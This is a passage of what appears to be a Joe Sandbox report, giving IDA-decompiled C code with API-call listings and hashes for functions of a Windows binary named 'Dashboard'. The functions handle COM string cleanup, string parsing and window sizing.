                                                                                                                    					return E010088FB(_t64);
                                                                                                                    				}
                                                                                                                    				_t66 =  *((intOrPtr*)(_t115 - 0x24));
                                                                                                                    				_push(_t115 - 0x1c);
                                                                                                                    				 *((intOrPtr*)(_t115 - 0x1c)) = 0;
                                                                                                                    				_push(_t66);
                                                                                                                    				if( *((intOrPtr*)( *_t66 + 0x1c))() >= 0 &&  *((intOrPtr*)(_t115 - 0x1c)) > 0) {
                                                                                                                    					_t112 = 1;
                                                                                                                    					if( *((intOrPtr*)(_t115 - 0x1c)) >= 1) {
                                                                                                                    						_t114 = __imp__#6;
                                                                                                                    						while(1) {
                                                                                                                    							 *((intOrPtr*)(_t115 - 0x10)) = 0;
                                                                                                                    							 *((intOrPtr*)(_t115 - 0x18)) = 0;
                                                                                                                    							 *((intOrPtr*)(_t115 - 0x14)) = 0;
                                                                                                                    							_t68 =  *((intOrPtr*)(_t115 - 0x24));
                                                                                                                    							_push(_t115 - 0x10);
                                                                                                                    							_push(_t112);
                                                                                                                    							_push(_t68);
                                                                                                                    							 *(_t115 - 4) = 3;
                                                                                                                    							if( *((intOrPtr*)( *_t68 + 0x20))() < 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t74 =  *((intOrPtr*)(_t115 - 0x10));
                                                                                                                    							_push(_t115 - 0x18);
                                                                                                                    							_push(_t74);
                                                                                                                    							if( *((intOrPtr*)( *_t74 + 0x1c))() < 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							 *((intOrPtr*)(_t115 - 0x20)) = 0;
                                                                                                                    							 *(_t115 - 4) = 4;
                                                                                                                    							if(E0100920F( *((intOrPtr*)(_t115 - 0x10)), _t115 - 0x20) < 0) {
                                                                                                                    								L9:
                                                                                                                    								_t78 =  *((intOrPtr*)(_t115 - 0x10));
                                                                                                                    								 *((intOrPtr*)(_t115 - 0x28)) = 0;
                                                                                                                    								 *((intOrPtr*)( *_t78 + 0x30))(_t78, _t115 - 0x28);
                                                                                                                    								_t80 =  *0x101a004; // 0x101a004
                                                                                                                    								if(_t80 != 0x101a004 && ( *(_t80 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    									_t37 = _t80 + 0x14; // 0x65637845
                                                                                                                    									_t38 = _t80 + 0x10; // 0x6c744143
                                                                                                                    									E01008FEA( *_t38,  *_t37, 0x64, 0x1001e2c, _t112,  *((intOrPtr*)(_t115 - 0x18)),  *((intOrPtr*)(_t115 - 0x14)),  *((intOrPtr*)(_t115 - 0x28)));
                                                                                                                    								}
                                                                                                                    								_t81 =  *((intOrPtr*)(_t115 - 0x20));
                                                                                                                    								 *(_t115 - 4) = 3;
                                                                                                                    								if(_t81 != 0) {
                                                                                                                    									 *((intOrPtr*)( *_t81 + 8))(_t81);
                                                                                                                    								}
                                                                                                                    								 *_t114( *((intOrPtr*)(_t115 - 0x14)));
                                                                                                                    								 *_t114( *((intOrPtr*)(_t115 - 0x18)));
                                                                                                                    								_t84 =  *((intOrPtr*)(_t115 - 0x10));
                                                                                                                    								 *(_t115 - 4) = 0;
                                                                                                                    								if(_t84 != 0) {
                                                                                                                    									 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                    								}
                                                                                                                    								_t112 = _t112 + 1;
                                                                                                                    								if(_t112 <=  *((intOrPtr*)(_t115 - 0x1c))) {
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									goto L22;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t88 =  *((intOrPtr*)(_t115 - 0x20));
                                                                                                                    							_push(_t115 - 0x14);
                                                                                                                    							_push(_t88);
                                                                                                                    							if( *((intOrPtr*)( *_t88 + 0x48))() < 0) {
                                                                                                                    								_t90 =  *((intOrPtr*)(_t115 - 0x20));
                                                                                                                    								__eflags = _t90;
                                                                                                                    								 *(_t115 - 4) = 3;
                                                                                                                    								if(_t90 != 0) {
                                                                                                                    									 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                                                                    								}
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							goto L9;
                                                                                                                    						}
                                                                                                                    						 *_t114( *((intOrPtr*)(_t115 - 0x14)));
                                                                                                                    						 *_t114( *((intOrPtr*)(_t115 - 0x18)));
                                                                                                                    						_t72 =  *((intOrPtr*)(_t115 - 0x10));
                                                                                                                    						__eflags = _t72;
                                                                                                                    						 *(_t115 - 4) = 0;
                                                                                                                    						if(_t72 != 0) {
                                                                                                                    							 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}


















                                                                                                                    0x01009783
                                                                                                                    0x01009783
                                                                                                                    0x0100978a
                                                                                                                    0x01009791
                                                                                                                    0x01009797
                                                                                                                    0x01009798
                                                                                                                    0x010097a2
                                                                                                                    0x010098db
                                                                                                                    0x010098db
                                                                                                                    0x010098de
                                                                                                                    0x010098e4
                                                                                                                    0x010098e9
                                                                                                                    0x010098e9
                                                                                                                    0x010098f1
                                                                                                                    0x010098f1
                                                                                                                    0x010097a8
                                                                                                                    0x010097ae
                                                                                                                    0x010097af
                                                                                                                    0x010097b4
                                                                                                                    0x010097ba
                                                                                                                    0x010097cb
                                                                                                                    0x010097cf
                                                                                                                    0x010097d5
                                                                                                                    0x010097db
                                                                                                                    0x010097db
                                                                                                                    0x010097de
                                                                                                                    0x010097e1
                                                                                                                    0x010097e4
                                                                                                                    0x010097ec
                                                                                                                    0x010097ed
                                                                                                                    0x010097ee
                                                                                                                    0x010097ef
                                                                                                                    0x010097f8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010097fe
                                                                                                                    0x01009806
                                                                                                                    0x01009807
                                                                                                                    0x0100980d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01009813
                                                                                                                    0x0100981d
                                                                                                                    0x01009828
                                                                                                                    0x0100983b
                                                                                                                    0x0100983b
                                                                                                                    0x01009842
                                                                                                                    0x01009848
                                                                                                                    0x0100984b
                                                                                                                    0x01009855
                                                                                                                    0x0100986e
                                                                                                                    0x01009871
                                                                                                                    0x01009874
                                                                                                                    0x01009874
                                                                                                                    0x01009879
                                                                                                                    0x0100987e
                                                                                                                    0x01009882
                                                                                                                    0x01009887
                                                                                                                    0x01009887
                                                                                                                    0x0100988d
                                                                                                                    0x01009892
                                                                                                                    0x01009894
                                                                                                                    0x01009899
                                                                                                                    0x0100989c
                                                                                                                    0x010098a1
                                                                                                                    0x010098a1
                                                                                                                    0x010098a4
                                                                                                                    0x010098a8
                                                                                                                    0x00000000
                                                                                                                    0x010098ae
                                                                                                                    0x00000000
                                                                                                                    0x010098ae
                                                                                                                    0x010098a8
                                                                                                                    0x0100982a
                                                                                                                    0x01009832
                                                                                                                    0x01009833
                                                                                                                    0x01009839
                                                                                                                    0x010098b0
                                                                                                                    0x010098b3
                                                                                                                    0x010098b5
                                                                                                                    0x010098b9
                                                                                                                    0x010098be
                                                                                                                    0x010098be
                                                                                                                    0x00000000
                                                                                                                    0x010098b9
                                                                                                                    0x00000000
                                                                                                                    0x01009839
                                                                                                                    0x010098c4
                                                                                                                    0x010098c9
                                                                                                                    0x010098cb
                                                                                                                    0x010098ce
                                                                                                                    0x010098d0
                                                                                                                    0x010098d3
                                                                                                                    0x010098d8
                                                                                                                    0x010098d8
                                                                                                                    0x010098d3
                                                                                                                    0x010097cf

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0100978A
                                                                                                                      • Part of subcall function 010096D9: __EH_prolog3.LIBCMT ref: 010096E0
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0100988D
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 01009892
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 010098C4
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 010098C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3629739108-0
                                                                                                                    • Opcode ID: e02a6200ded8b7db9cc0e8026aa6b0f8f69c1fd2eb10aab8edaad185103c5dfa
                                                                                                                    • Instruction ID: 48c2d3afbd75c128bde8091f1f95c1a2f5d87b1d543480c31fda6a5090f94283
                                                                                                                    • Opcode Fuzzy Hash: e02a6200ded8b7db9cc0e8026aa6b0f8f69c1fd2eb10aab8edaad185103c5dfa
                                                                                                                    • Instruction Fuzzy Hash: 9A510F71D0024ADFDF02DFD8C9849EEBBB5BF48304F2444A9E249EB291C7359A46DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E0100E39F(WCHAR** __ecx, void* __eflags, WCHAR* _a4) {
                                                                                                                    				signed short* _v8;
                                                                                                                    				WCHAR* _t15;
                                                                                                                    				signed int _t17;
                                                                                                                    				signed int _t18;
                                                                                                                    				WCHAR* _t19;
                                                                                                                    				signed int _t21;
                                                                                                                    				WCHAR* _t23;
                                                                                                                    				signed int _t24;
                                                                                                                    				WCHAR* _t27;
                                                                                                                    				WCHAR* _t28;
                                                                                                                    				WCHAR* _t29;
                                                                                                                    				signed int _t31;
                                                                                                                    				WCHAR* _t34;
                                                                                                                    				signed int _t39;
                                                                                                                    				WCHAR* _t45;
                                                                                                                    				signed short* _t53;
                                                                                                                    				WCHAR** _t58;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_t58 = __ecx;
                                                                                                                    				E0100E376(__ecx, __eflags);
                                                                                                                    				_t15 =  *__ecx;
                                                                                                                    				_t39 =  *_t15 & 0x0000ffff;
                                                                                                                    				if(_t39 != 0) {
                                                                                                                    					__eflags = _t39 - 0x27;
                                                                                                                    					_t53 = _a4;
                                                                                                                    					_v8 = _t53;
                                                                                                                    					if(_t39 != 0x27) {
                                                                                                                    						while(1) {
                                                                                                                    							_t34 =  *_t58;
                                                                                                                    							_t17 = E0100E349( *_t34 & 0x0000ffff);
                                                                                                                    							__eflags = _t17;
                                                                                                                    							if(_t17 != 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t19 = CharNextW(_t34);
                                                                                                                    							 *_t58 = _t19;
                                                                                                                    							_t21 = _t19 - _t34 >> 1;
                                                                                                                    							__eflags = _t53 + 2 + _t21 * 2 -  &(_v8[0x1000]);
                                                                                                                    							if(_t53 + 2 + _t21 * 2 >=  &(_v8[0x1000])) {
                                                                                                                    								goto L24;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t21;
                                                                                                                    								if(_t21 > 0) {
                                                                                                                    									do {
                                                                                                                    										 *_t53 =  *_t34;
                                                                                                                    										_t53 =  &(_t53[1]);
                                                                                                                    										_t34 =  &(_t34[1]);
                                                                                                                    										_t21 = _t21 - 1;
                                                                                                                    										__eflags = _t21;
                                                                                                                    									} while (_t21 != 0);
                                                                                                                    								}
                                                                                                                    								__eflags =  *( *_t58);
                                                                                                                    								if( *( *_t58) != 0) {
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							goto L22;
                                                                                                                    						}
                                                                                                                    						 *_t53 =  *_t53 & 0x00000000;
                                                                                                                    						__eflags =  *_t53;
                                                                                                                    						goto L21;
                                                                                                                    					} else {
                                                                                                                    						_t23 = CharNextW(_t15);
                                                                                                                    						 *_t58 = _t23;
                                                                                                                    						while(1) {
                                                                                                                    							__eflags =  *_t23;
                                                                                                                    							if( *_t23 == 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t24 = E0100E105(_t58);
                                                                                                                    							__eflags = _t24;
                                                                                                                    							if(_t24 != 0) {
                                                                                                                    								break;
                                                                                                                    							} else {
                                                                                                                    								_t27 =  *_t58;
                                                                                                                    								__eflags =  *_t27 - 0x27;
                                                                                                                    								if( *_t27 == 0x27) {
                                                                                                                    									 *_t58 = CharNextW(_t27);
                                                                                                                    								}
                                                                                                                    								_t28 =  *_t58;
                                                                                                                    								_a4 = _t28;
                                                                                                                    								_t29 = CharNextW(_t28);
                                                                                                                    								 *_t58 = _t29;
                                                                                                                    								_t31 = _t29 - _a4 >> 1;
                                                                                                                    								__eflags = _t53 + 2 + _t31 * 2 -  &(_v8[0x1000]);
                                                                                                                    								if(_t53 + 2 + _t31 * 2 >=  &(_v8[0x1000])) {
                                                                                                                    									L24:
                                                                                                                    									_t18 = 0x80020009;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t31;
                                                                                                                    									if(_t31 > 0) {
                                                                                                                    										_t45 = _a4;
                                                                                                                    										do {
                                                                                                                    											 *_t53 =  *_t45;
                                                                                                                    											_t53 =  &(_t53[1]);
                                                                                                                    											_t45 =  &(_t45[1]);
                                                                                                                    											_t31 = _t31 - 1;
                                                                                                                    											__eflags = _t31;
                                                                                                                    										} while (_t31 != 0);
                                                                                                                    									}
                                                                                                                    									_t23 =  *_t58;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							goto L22;
                                                                                                                    						}
                                                                                                                    						__eflags =  *( *_t58);
                                                                                                                    						if( *( *_t58) == 0) {
                                                                                                                    							goto L24;
                                                                                                                    						} else {
                                                                                                                    							 *_t53 =  *_t53 & 0x00000000;
                                                                                                                    							 *_t58 = CharNextW( *_t58);
                                                                                                                    							L21:
                                                                                                                    							_t18 = 0;
                                                                                                                    							__eflags = 0;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					L22:
                                                                                                                    				} else {
                                                                                                                    					_t18 = 0x80020009;
                                                                                                                    				}
                                                                                                                    				return _t18;
                                                                                                                    			}




















                                                                                                                    0x0100e3a4
                                                                                                                    0x0100e3a6
                                                                                                                    0x0100e3a8
                                                                                                                    0x0100e3ad
                                                                                                                    0x0100e3af
                                                                                                                    0x0100e3b5
                                                                                                                    0x0100e3c1
                                                                                                                    0x0100e3c7
                                                                                                                    0x0100e3ca
                                                                                                                    0x0100e3cd
                                                                                                                    0x0100e448
                                                                                                                    0x0100e448
                                                                                                                    0x0100e450
                                                                                                                    0x0100e455
                                                                                                                    0x0100e457
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100e45a
                                                                                                                    0x0100e463
                                                                                                                    0x0100e467
                                                                                                                    0x0100e473
                                                                                                                    0x0100e475
                                                                                                                    0x00000000
                                                                                                                    0x0100e477
                                                                                                                    0x0100e477
                                                                                                                    0x0100e479
                                                                                                                    0x0100e47b
                                                                                                                    0x0100e47e
                                                                                                                    0x0100e482
                                                                                                                    0x0100e484
                                                                                                                    0x0100e485
                                                                                                                    0x0100e485
                                                                                                                    0x0100e485
                                                                                                                    0x0100e47b
                                                                                                                    0x0100e48a
                                                                                                                    0x0100e48e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100e48e
                                                                                                                    0x00000000
                                                                                                                    0x0100e475
                                                                                                                    0x0100e490
                                                                                                                    0x0100e490
                                                                                                                    0x00000000
                                                                                                                    0x0100e3cf
                                                                                                                    0x0100e3d6
                                                                                                                    0x0100e3d8
                                                                                                                    0x0100e42e
                                                                                                                    0x0100e42e
                                                                                                                    0x0100e432
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100e3de
                                                                                                                    0x0100e3e3
                                                                                                                    0x0100e3e5
                                                                                                                    0x00000000
                                                                                                                    0x0100e3e7
                                                                                                                    0x0100e3e7
                                                                                                                    0x0100e3e9
                                                                                                                    0x0100e3ed
                                                                                                                    0x0100e3f2
                                                                                                                    0x0100e3f2
                                                                                                                    0x0100e3f4
                                                                                                                    0x0100e3f7
                                                                                                                    0x0100e3fa
                                                                                                                    0x0100e3ff
                                                                                                                    0x0100e40a
                                                                                                                    0x0100e410
                                                                                                                    0x0100e412
                                                                                                                    0x0100e49d
                                                                                                                    0x0100e49d
                                                                                                                    0x0100e418
                                                                                                                    0x0100e418
                                                                                                                    0x0100e41a
                                                                                                                    0x0100e41c
                                                                                                                    0x0100e41f
                                                                                                                    0x0100e422
                                                                                                                    0x0100e426
                                                                                                                    0x0100e428
                                                                                                                    0x0100e429
                                                                                                                    0x0100e429
                                                                                                                    0x0100e429
                                                                                                                    0x0100e41f
                                                                                                                    0x0100e42c
                                                                                                                    0x00000000
                                                                                                                    0x0100e42c
                                                                                                                    0x0100e412
                                                                                                                    0x00000000
                                                                                                                    0x0100e3e5
                                                                                                                    0x0100e436
                                                                                                                    0x0100e43a
                                                                                                                    0x00000000
                                                                                                                    0x0100e43c
                                                                                                                    0x0100e43c
                                                                                                                    0x0100e444
                                                                                                                    0x0100e494
                                                                                                                    0x0100e494
                                                                                                                    0x0100e494
                                                                                                                    0x0100e494
                                                                                                                    0x0100e43a
                                                                                                                    0x0100e496
                                                                                                                    0x0100e3b7
                                                                                                                    0x0100e3b7
                                                                                                                    0x0100e3b7
                                                                                                                    0x0100e49a

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3213498283-0
                                                                                                                    • Opcode ID: b3424546fbc53943c34953f7ae7028372be4bc65b3d5d4b3abee321f92e1d46b
                                                                                                                    • Instruction ID: 16616e433eb240b509ac8e50b31b0acdb8d5149847edf7b3a836d46a9280c1bd
                                                                                                                    • Opcode Fuzzy Hash: b3424546fbc53943c34953f7ae7028372be4bc65b3d5d4b3abee321f92e1d46b
                                                                                                                    • Instruction Fuzzy Hash: A631AD70600202DBFB279F28C884A6ABBE5EF55355F614C68E8C2E72D2EB70D891C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E0100EEFA(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t59;
                                                                                                                    				int _t61;
                                                                                                                    				signed int _t62;
                                                                                                                    				signed int _t63;
                                                                                                                    				signed int _t66;
                                                                                                                    				signed int _t67;
                                                                                                                    				signed int _t96;
                                                                                                                    				signed int _t97;
                                                                                                                    				void* _t98;
                                                                                                                    				WCHAR* _t103;
                                                                                                                    
                                                                                                                    				_push(0x24);
                                                                                                                    				E01008847(E0101601A, __ebx, __edi, __esi);
                                                                                                                    				 *((intOrPtr*)(_t98 - 0x30)) = __ecx;
                                                                                                                    				if( *(_t98 + 8) == 0) {
                                                                                                                    					L10:
                                                                                                                    					_t59 = 0;
                                                                                                                    				} else {
                                                                                                                    					_t103 =  *(_t98 + 0xc);
                                                                                                                    					if(_t103 == 0) {
                                                                                                                    						goto L10;
                                                                                                                    					} else {
                                                                                                                    						 *((intOrPtr*)(_t98 - 0x1c)) = 0;
                                                                                                                    						_t61 = lstrlenW( *(_t98 + 8));
                                                                                                                    						_t62 = _t61 + _t61 + 2;
                                                                                                                    						_t96 = 2;
                                                                                                                    						 *(_t98 - 0x20) = _t62;
                                                                                                                    						_t63 = _t62 * _t96;
                                                                                                                    						 *(_t98 - 0x14) = 0;
                                                                                                                    						 *(_t98 - 4) = 0;
                                                                                                                    						_push( ~(0 | _t103 > 0x00000000) | _t63);
                                                                                                                    						L010082FB();
                                                                                                                    						 *(_t98 - 0x14) = _t63;
                                                                                                                    						 *(_t98 - 4) = _t96;
                                                                                                                    						 *(_t98 - 0x2c) =  *(_t98 - 0x14);
                                                                                                                    						_t66 = lstrlenW( *(_t98 + 0xc)) + _t65 + 2;
                                                                                                                    						 *(_t98 - 0x24) = _t66;
                                                                                                                    						_t67 = _t66 * _t96;
                                                                                                                    						 *(_t98 - 0x18) = 0;
                                                                                                                    						 *(_t98 - 4) = 3;
                                                                                                                    						_push( ~(0 | _t103 > 0x00000000) | _t67);
                                                                                                                    						L010082FB();
                                                                                                                    						 *(_t98 - 0x18) = _t67;
                                                                                                                    						 *(_t98 - 4) = _t96;
                                                                                                                    						_t97 =  *(_t98 - 0x18);
                                                                                                                    						 *(_t98 - 4) = 5;
                                                                                                                    						 *(_t98 - 0x28) = _t97;
                                                                                                                    						if( *(_t98 - 0x14) == 0 || _t97 == 0) {
                                                                                                                    							L7:
                                                                                                                    							 *((intOrPtr*)(_t98 - 0x1c)) = 0x8007000e;
                                                                                                                    						} else {
                                                                                                                    							E0100DF4D(E0100DF4D(_t67,  *(_t98 - 0x14),  *(_t98 - 0x20),  *(_t98 + 8),  *(_t98 - 0x20)), _t97,  *(_t98 - 0x24),  *(_t98 + 0xc),  *(_t98 - 0x24));
                                                                                                                    							if(E0100EBAB( *((intOrPtr*)(_t98 - 0x30)), _t98 - 0x14, _t98 - 0x18) != 0) {
                                                                                                                    								 *(_t98 - 0x2c) = 0;
                                                                                                                    								 *(_t98 - 0x28) = 0;
                                                                                                                    							} else {
                                                                                                                    								goto L7;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_push( *(_t98 - 0x28));
                                                                                                                    						L0100871A();
                                                                                                                    						_push( *(_t98 - 0x2c));
                                                                                                                    						L0100871A();
                                                                                                                    						_t59 = 0 |  *((intOrPtr*)(_t98 - 0x1c)) >= 0x00000000;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010088FB(_t59);
                                                                                                                    			}













                                                                                                                    0x0100eefa
                                                                                                                    0x0100ef01
                                                                                                                    0x0100ef06
                                                                                                                    0x0100ef0e
                                                                                                                    0x0100f016
                                                                                                                    0x0100f016
                                                                                                                    0x0100ef14
                                                                                                                    0x0100ef14
                                                                                                                    0x0100ef17
                                                                                                                    0x00000000
                                                                                                                    0x0100ef1d
                                                                                                                    0x0100ef20
                                                                                                                    0x0100ef23
                                                                                                                    0x0100ef2b
                                                                                                                    0x0100ef31
                                                                                                                    0x0100ef32
                                                                                                                    0x0100ef37
                                                                                                                    0x0100ef3c
                                                                                                                    0x0100ef3f
                                                                                                                    0x0100ef46
                                                                                                                    0x0100ef47
                                                                                                                    0x0100ef4d
                                                                                                                    0x0100ef63
                                                                                                                    0x0100ef66
                                                                                                                    0x0100ef6f
                                                                                                                    0x0100ef75
                                                                                                                    0x0100ef7a
                                                                                                                    0x0100ef7f
                                                                                                                    0x0100ef82
                                                                                                                    0x0100ef8a
                                                                                                                    0x0100ef8b
                                                                                                                    0x0100ef91
                                                                                                                    0x0100ef94
                                                                                                                    0x0100efa4
                                                                                                                    0x0100efa7
                                                                                                                    0x0100efab
                                                                                                                    0x0100efae
                                                                                                                    0x0100efeb
                                                                                                                    0x0100efeb
                                                                                                                    0x0100efb4
                                                                                                                    0x0100efcf
                                                                                                                    0x0100efe9
                                                                                                                    0x0100eff4
                                                                                                                    0x0100eff7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100efe9
                                                                                                                    0x0100effa
                                                                                                                    0x0100effd
                                                                                                                    0x0100f002
                                                                                                                    0x0100f005
                                                                                                                    0x0100f011
                                                                                                                    0x0100f011
                                                                                                                    0x0100ef17
                                                                                                                    0x0100f01d

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0100EF01
                                                                                                                    • lstrlenW.KERNEL32(00000000,00000024,0100F066,00000000,00000000), ref: 0100EF23
                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0100EF69
                                                                                                                    • ??_V@YAXPAX@Z.MSVCR80 ref: 0100EFFD
                                                                                                                    • ??_V@YAXPAX@Z.MSVCR80 ref: 0100F005
                                                                                                                      • Part of subcall function 0100DF4D: memcpy_s.MSVCR80 ref: 0100DF5E
                                                                                                                      • Part of subcall function 0100EBAB: _recalloc.MSVCR80(?,?,00000004), ref: 0100EBC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$H_prolog3_catch_recallocmemcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 866230722-0
                                                                                                                    • Opcode ID: bde39072cdf66372d12632a768744ff009ee50771f33cca111ec82214d9dc2e7
                                                                                                                    • Instruction ID: 4a05fd8a4a72c2b3ad31ae83afca6777715ace8a1ed717b12051f600431f0c05
                                                                                                                    • Opcode Fuzzy Hash: bde39072cdf66372d12632a768744ff009ee50771f33cca111ec82214d9dc2e7
                                                                                                                    • Instruction Fuzzy Hash: EC314872D0120AEFEF16DFA8D8018EEFBF4BF48300F14842AE685B6190DA358641DB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0100D50F(intOrPtr* __ecx, void* __eflags, struct tagRECT* _a4) {
                                                                                                                    				int _v8;
                                                                                                                    				intOrPtr* _v12;
                                                                                                                    				char _v20;
                                                                                                                    				void* _t13;
                                                                                                                    				int _t14;
                                                                                                                    				int* _t16;
                                                                                                                    				int _t17;
                                                                                                                    				int _t29;
                                                                                                                    				void* _t35;
                                                                                                                    				int _t36;
                                                                                                                    				struct tagRECT* _t37;
                                                                                                                    
                                                                                                                    				_v12 = __ecx;
                                                                                                                    				_v8 = 0;
                                                                                                                    				_t14 = E0100CE8D(_t13, __ecx);
                                                                                                                    				if(_t14 != 0) {
                                                                                                                    					__imp__?RMLoadInt@@YGHIHKPB_W@Z(0x65, 0, 0xf, 0, _t35);
                                                                                                                    					_t36 = _t14;
                                                                                                                    					if(_t36 <= 0) {
                                                                                                                    						_t36 = 0x7fff;
                                                                                                                    					}
                                                                                                                    					_t16 =  &_v20;
                                                                                                                    					__imp__?UpdateAndGetDesiredSize@Element@DirectUI@@QAE?AUtagSIZE@@HH@Z(_t16, _t36, 0x7fff);
                                                                                                                    					_t29 =  *_t16;
                                                                                                                    					_t17 = _t16[1];
                                                                                                                    					if(_t29 < _t36) {
                                                                                                                    						_t29 = _t36;
                                                                                                                    					}
                                                                                                                    					_t37 = _a4;
                                                                                                                    					SetRect(_t37, 0, 0, _t29, _t17);
                                                                                                                    					AdjustWindowRectEx(_t37,  *((intOrPtr*)( *_v12 + 0x24))(), 0, 0);
                                                                                                                    					SetRect(_t37, 0, 0, _t37->right - _t37->left, _t37->bottom - _t37->top);
                                                                                                                    				} else {
                                                                                                                    					_v8 = 0x8000ffff;
                                                                                                                    				}
                                                                                                                    				return _v8;
                                                                                                                    			}














                                                                                                                    0x0100d51b
                                                                                                                    0x0100d51e
                                                                                                                    0x0100d521
                                                                                                                    0x0100d52a
                                                                                                                    0x0100d53c
                                                                                                                    0x0100d542
                                                                                                                    0x0100d54b
                                                                                                                    0x0100d54d
                                                                                                                    0x0100d54d
                                                                                                                    0x0100d551
                                                                                                                    0x0100d557
                                                                                                                    0x0100d55d
                                                                                                                    0x0100d561
                                                                                                                    0x0100d564
                                                                                                                    0x0100d566
                                                                                                                    0x0100d566
                                                                                                                    0x0100d568
                                                                                                                    0x0100d576
                                                                                                                    0x0100d584
                                                                                                                    0x0100d59a
                                                                                                                    0x0100d52c
                                                                                                                    0x0100d52c
                                                                                                                    0x0100d52c
                                                                                                                    0x0100d5a3

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100CE8D: ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE(0100D2E1), ref: 0100CE90
                                                                                                                      • Part of subcall function 0100CE8D: ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(00000000), ref: 0100CEA1
                                                                                                                    • ?RMLoadInt@@YGHIHKPB_W@Z.UXCORE(00000065,00000000,0000000F,00000000), ref: 0100D53C
                                                                                                                    • ?UpdateAndGetDesiredSize@Element@DirectUI@@QAE?AUtagSIZE@@HH@Z.UXCORE(?,00000000,00007FFF), ref: 0100D557
                                                                                                                    • SetRect.USER32 ref: 0100D576
                                                                                                                    • AdjustWindowRectEx.USER32(?,00000000,?,?), ref: 0100D584
                                                                                                                    • SetRect.USER32 ref: 0100D59A
                                                                                                                    Memory Dump Source
